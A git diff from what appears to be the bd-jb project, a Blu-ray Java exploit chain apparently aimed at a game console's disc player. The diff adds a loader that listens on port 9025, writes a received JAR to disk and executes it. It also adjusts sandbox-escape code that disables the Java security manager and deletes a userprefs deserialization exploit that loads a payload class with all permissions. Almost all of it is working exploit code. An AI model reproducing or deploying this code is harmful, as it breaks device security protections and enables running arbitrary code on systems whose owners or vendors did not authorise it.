diff --git a/Makefile b/Makefile
index a888512..db5e02f 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,12 @@ LIB = lib
SRC = src
TOOLS = tools
-CLASSES = \
- $(SRC)/com/bdjb/ExploitXlet.java \
+LOADER_CLASSES = \
+ $(SRC)/com/bdjb/LoaderXlet.java \
+ $(SRC)/com/bdjb/Loader.java \
+ $(SRC)/com/bdjb/Screen.java \
+
+EXPLOIT_CLASSES = \
$(SRC)/com/bdjb/Exploit.java \
$(SRC)/com/bdjb/Screen.java \
$(SRC)/com/bdjb/api/API.java \
@@ -25,39 +29,42 @@ CLASSES = \
$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
- $(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
- $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
-all: directory serialized classes jar bdjo_bdmv
+all: loader exploit
-directory:
+loader: build_directory loader_classes loader_jar loader_bdjo_bdmv
+
+exploit: build_directory exploit_classes exploit_jar
+
+build_directory:
mkdir -p $(BUILD)
-serialized:
- javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
- java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
- rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
+loader_classes:
+ javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES)
-classes:
- javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
+exploit_classes:
+ javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES)
-jar:
- rm -rf $(BUILD)/jdk
+loader_jar:
mkdir -p $(DISC)/BDMV/JAR
- cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
+ cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
-bdjo_bdmv:
+exploit_jar:
+ rm -rf $(BUILD)/jdk
+ cd $(BUILD) && jar cf 00000.jar . && cd ..
+
+loader_bdjo_bdmv:
mkdir -p $(DISC)/BDMV/BDJO
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
diff --git a/bdmv/bdjo.xml b/bdmv/bdjo.xml
index da6cc69..21e4266 100644
--- a/bdmv/bdjo.xml
+++ b/bdmv/bdjo.xml
@@ -15,7 +15,7 @@
0x0
- com.bdjb.ExploitXlet
+ com.bdjb.LoaderXlet
128
1
diff --git a/src/com/bdjb/Exploit.java b/src/com/bdjb/Exploit.java
index cedef3c..e7bc494 100644
--- a/src/com/bdjb/Exploit.java
+++ b/src/com/bdjb/Exploit.java
@@ -9,26 +9,16 @@ package com.bdjb;
import com.bdjb.exploit.kernel.ExploitKernelInterface;
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
-import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.net.InetAddress;
-import java.net.ServerSocket;
-import java.net.Socket;
-
-class Exploit implements Runnable {
- static void init() {
- Screen.println("[+] bd-jb by theflow");
+import java.lang.reflect.Method;
+public class Exploit {
+ public static void main(Method screenPrintln) {
+ Screen.setRemotePrintln(screenPrintln);
Screen.println("[*] Escaping Java Sandbox...");
- Class[] sandboxExploits =
- new Class[] {
- ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
- };
+ Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class};
for (int i = 0; i < sandboxExploits.length; i++) {
try {
@@ -46,29 +36,4 @@ class Exploit implements Runnable {
Screen.println("[-] Error could not disable security manager.");
}
}
-
- static void start() {
- new Thread(new Exploit()).start();
- }
-
- public void run() {
- if (System.getSecurityManager() != null) {
- return;
- }
-
- Screen.println("[*] Exploiting kernel...");
-
- Class[] kernelExploits = new Class[] {};
-
- for (int i = 0; i < kernelExploits.length; i++) {
- try {
- ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
- if (exploit.trigger()) {
- break;
- }
- } catch (Exception e) {
- continue;
- }
- }
- }
}
diff --git a/src/com/bdjb/Loader.java b/src/com/bdjb/Loader.java
new file mode 100644
index 0000000..6a83944
--- /dev/null
+++ b/src/com/bdjb/Loader.java
@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) 2021 Andy Nguyen
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license. See the LICENSE file for details.
+ */
+
+package com.bdjb;
+
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.URL;
+import java.lang.reflect.Method;
+import org.dvb.lang.DVBClassLoader;
+
+class Loader implements Runnable {
+ private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar";
+
+ private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit";
+ private static final String MAIN_METHOD_NAME = "main";
+ private static final String PRINTLN_METHOD_NAME = "println";
+
+ static void startJarLoader() {
+ new Thread(new Loader()).start();
+ }
+
+ public void run() {
+ Screen.println("[+] bd-jb by theflow");
+
+ while (true) {
+ Screen.println("[*] Listening for remote JAR on port 9025...");
+
+ try {
+ ServerSocket serverSocket = new ServerSocket(9025);
+ Socket socket = serverSocket.accept();
+ InputStream inputStream = socket.getInputStream();
+ OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
+
+ byte[] buf = new byte[8192];
+ int total = 0;
+ int read;
+ while ((read = inputStream.read(buf)) > 0) {
+ outputStream.write(buf, 0, read);
+ total += read;
+ }
+
+ outputStream.close();
+ inputStream.close();
+
+ serverSocket.close();
+
+ Screen.println("[+] Received " + total + " bytes");
+
+ Screen.println("[+] Launching JAR...");
+
+ DVBClassLoader dvbClassLoader =
+ DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)});
+ Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME);
+ Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class});
+ Method screenPrintln =
+ Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class});
+ main.invoke(null, new Object[] {screenPrintln});
+
+ Screen.println("[+] JAR exited");
+ } catch (Exception e) {
+ Screen.println("[-] Error: " + e.getMessage());
+ }
+ }
+ }
+}
diff --git a/src/com/bdjb/ExploitXlet.java b/src/com/bdjb/LoaderXlet.java
similarity index 91%
rename from src/com/bdjb/ExploitXlet.java
rename to src/com/bdjb/LoaderXlet.java
index 92bd947..9299dc5 100644
--- a/src/com/bdjb/ExploitXlet.java
+++ b/src/com/bdjb/LoaderXlet.java
@@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext;
import org.havi.ui.HScene;
import org.havi.ui.HSceneFactory;
-public class ExploitXlet implements Xlet {
+public class LoaderXlet implements Xlet {
private HScene scene;
private Screen screen;
public void initXlet(XletContext context) {
- Exploit.init();
-
screen = Screen.getInstance();
screen.setSize(1920, 1080); // BD screen size
@@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet {
public void startXlet() {
screen.setVisible(true);
scene.setVisible(true);
- Exploit.start();
+ Loader.startJarLoader();
}
public void pauseXlet() {
diff --git a/src/com/bdjb/Screen.java b/src/com/bdjb/Screen.java
index c3443ad..b3e0c96 100644
--- a/src/com/bdjb/Screen.java
+++ b/src/com/bdjb/Screen.java
@@ -11,6 +11,7 @@ import java.awt.Color;
import java.awt.Container;
import java.awt.Font;
import java.awt.Graphics;
+import java.lang.reflect.Method;
import java.util.ArrayList;
public class Screen extends Container {
@@ -22,13 +23,27 @@ public class Screen extends Container {
private static final Screen instance = new Screen();
+ private static Method remoteScreenPrintln = null;
+
public static Screen getInstance() {
return instance;
}
+ public static void setRemotePrintln(Method screenPrintln) {
+ remoteScreenPrintln = screenPrintln;
+ }
+
public static void println(String msg) {
- messages.add(msg);
- instance.repaint();
+ if (remoteScreenPrintln != null) {
+ try {
+ remoteScreenPrintln.invoke(null, new Object[] {msg});
+ } catch (Exception e) {
+ // Ignore.
+ }
+ } else {
+ messages.add(msg);
+ instance.repaint();
+ }
}
public void paint(Graphics g) {
diff --git a/src/com/bdjb/bluray.ExploitXlet.perm b/src/com/bdjb/bluray.LoaderXlet.perm
similarity index 100%
rename from src/com/bdjb/bluray.ExploitXlet.perm
rename to src/com/bdjb/bluray.LoaderXlet.perm
diff --git a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java b/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
deleted file mode 100644
index 3d1979e..0000000
--- a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
+++ /dev/null
@@ -1,61 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.ObjectOutputStream;
-import java.io.OutputStream;
-import org.havi.ui.HSceneFactory;
-
-/** Implementation of the userprefs deserialization exploit. */
-public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
- private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
-
- private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
- "/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
-
- public boolean trigger() throws Exception {
- try {
- // Overwrite userprefs with a serialized PayloadClassLoader.
- InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
- OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
-
- byte[] buf = new byte[8192];
- int read;
- while ((read = inputStream.read(buf)) > 0) {
- outputStream.write(buf, 0, read);
- }
-
- outputStream.close();
- inputStream.close();
-
- // Trigger deserialization vulnerability.
- try {
- HSceneFactory.getInstance().getDefaultHScene();
- } catch (ClassCastException e) {
- // Exception expected.
-
- // Instantiate the payload class.
- PayloadClassLoader.getInstance().newPayload();
-
- return System.getSecurityManager() == null;
- }
- } finally {
- // Restore userprefs file.
- String[][] preferences = new String[9][];
- preferences[3] = new String[] {"26"};
- ObjectOutputStream outputStream =
- new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
- outputStream.writeObject(preferences);
- outputStream.close();
- }
-
- return false;
- }
-}
diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
deleted file mode 100644
index cae2277..0000000
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
+++ /dev/null
@@ -1,57 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.ByteArrayOutputStream;
-import java.io.InputStream;
-import java.io.ObjectInputStream;
-import java.io.Serializable;
-import java.security.AllPermission;
-import java.security.Permissions;
-import java.security.ProtectionDomain;
-
-/** ClassLoader subclass that is instantiated on deserialization. */
-class PayloadClassLoader extends ClassLoader implements Serializable {
- private static final long serialVersionUID = 0x4141414141414141L;
-
- private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
- private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
-
- private static PayloadClassLoader instance;
-
- static PayloadClassLoader getInstance() {
- return instance;
- }
-
- private void readObject(ObjectInputStream stream) {
- instance = this;
- }
-
- void newPayload() throws Exception {
- InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE);
- ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
-
- byte[] buf = new byte[8192];
- int read;
- while ((read = inputStream.read(buf)) > 0) {
- outputStream.write(buf, 0, read);
- }
-
- inputStream.close();
-
- byte[] payload = outputStream.toByteArray();
-
- // Instantiate the payload class with all permissions to disable the security manager.
- Permissions permissions = new Permissions();
- permissions.add(new AllPermission());
- ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions);
- Class payloadClass =
- defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain);
- payloadClass.newInstance();
- }
-}
diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
deleted file mode 100644
index c985ae2..0000000
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
+++ /dev/null
@@ -1,25 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import com.bdjb.exploit.sandbox.PayloadClassLoader;
-import java.io.FileOutputStream;
-import java.io.ObjectOutputStream;
-
-/** Simple util to create a serialized object of the PayloadClassLoader class. */
-class PayloadClassLoaderSerializer {
- public static void main(String[] args) {
- try {
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
- objectOutputStream.writeObject(new PayloadClassLoader());
- objectOutputStream.close();
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
-}